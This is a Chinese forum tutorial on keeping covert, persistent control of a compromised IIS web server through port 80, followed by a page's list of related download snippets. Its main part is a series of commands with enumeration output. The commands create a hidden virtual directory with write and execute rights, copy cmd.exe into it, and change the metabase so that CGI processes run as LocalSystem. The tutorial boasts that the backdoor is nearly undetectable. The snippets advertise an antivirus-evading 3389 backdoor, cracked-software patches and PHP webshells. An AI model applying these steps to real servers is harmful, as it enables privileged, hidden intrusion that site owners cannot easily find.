[size=small] IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。
如果你对此有情趣,跟我来...........
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. telnet到服务器
2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
Accessscript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemotescript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"
FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
不要告诉我你不知道上面的输出是什么!!!!
现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了
3. mkdir c:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"
这样就建好了一个虚目录:Virtual Dir1
你可以用 1 的命令看一下
5. 接下来要改变一下Virtual Dir1的属性为execute
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。
6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process
Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false
注释:cscript windows script host.
adsutil.vbs windows iis administration script
后面是 iis metabase path
这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)
大家不可以用来做非法的攻击,一切后果自负[/size]
分享到:
相关推荐
这是一款最新的3389免杀后门永远都是免杀的不信你可以试试看! 好用的话给我顶下!!!
文件 ajar.py -b <backdoor> -t <target> [-o ] ... 如果后门是一个持久性函数(例如侦听套接字的外壳程序),请确保将其分离到它自己的线程中,否则主应用程序将永远不会执行。 工具假定 javac 在您的路径中,您可以
管家婆千方百剂Ⅱ8.1.0.26365版五版合一去后门全功能完美免狗补丁,可以恢复大量数据测试 永远不会过期 永久使用
永远不要将其用于任何恶意目的。 后门遵循以下格式: Backdoorname_SHA1.php ,后门的名称是已知的。 PHP工具 这包括指向以下工具的链接: 反混淆器(在线和离线) 美化工具(在线和离线) 测试人员(运行代码-...
IIS永远的后门 IIS是比较流行的www服务器,设定不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是开启一个特殊的连接埠来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在...
本段文字主要涉及的是PHP后门技术,特别是PHP小马(PHP Web Shell)的使用和制作。PHP小马是一种可以远程控制服务器的恶意代码,它通过Web界面执行服务器命令,...对于任何Web应用程序来说,安全永远是不可忽视的重点。
很多人问为会什么都更新至2.6.X了,开源版才到这版本,官方的开源版永远都会滞后新版你懂的。 该版本为全VUE开源包,需要工具编译后才能使用,并非现成直接使用的开源文件,server为编译后的全端未对后门处理小白...
我们平时都会下载软件,但是有的软件可能会被别人下载修改后(比如加个后门病毒什么的)重新打包发布。 那如何检验文件是否被修改,就可以使用 CHK 这款便携的文件校验工具啦。 CHK 它可以验证文件的完整性。可以...
我们平时都会下载软件,但是有的软件可能会被别人下载修改后(比如加个后门病毒什么的)重新打包发布。 那如何检验文件是否被修改,就可以使用 CHK 这款便携的文件校验工具啦。 CHK 它可以验证文件的完整性。可以...
适用于 Minecraft Java Edition 1.12.2,需要自行下载forge mdk配置并编译,小鬼勿扰。 包含快速村民兑换、切换无限夜视等功能,还有一个永远不工作的后门,可选择自行删除
Metasploitable 2 配置 步骤1:下载 对于这次渗透测试,我们将使用此Metasploit实例: ... 步骤2:虚拟化产品 解压缩文件 使用VMWare或VirtualBox添加VM 步骤3:虚拟配置 将计算机与攻击计算机放在... 威胁n°2:后门FTP
本补丁无毒无后门,纯手工绿色编写。讫今为止,8.01.65版的破解补丁网上还找不到,这是首发。本补丁为个人业余爱好设计,仅供爱好者学习研究代码分析,请勿用于商业用途,对使用此补丁所发生的一切法律纠纷均与本人...
更为严重的是预设"后门","后门"就是信息系统中未公开的通道,在用户未授权的情 况下,系统的设计者或其他技术人员可以通过这些通道出入系统而不被用户发觉,这类 行为不仅损害客户的利益,大大影响银行在民众中的...
1. **恶意软件类型**:流氓应用属于恶意软件的一种,它们的行为包括但不限于自动发送短信、窃取密码、监控用户活动、植入后门等。了解这些恶意行为有助于我们提高警惕。 2. **下载来源**:避免从不可信的第三方应用...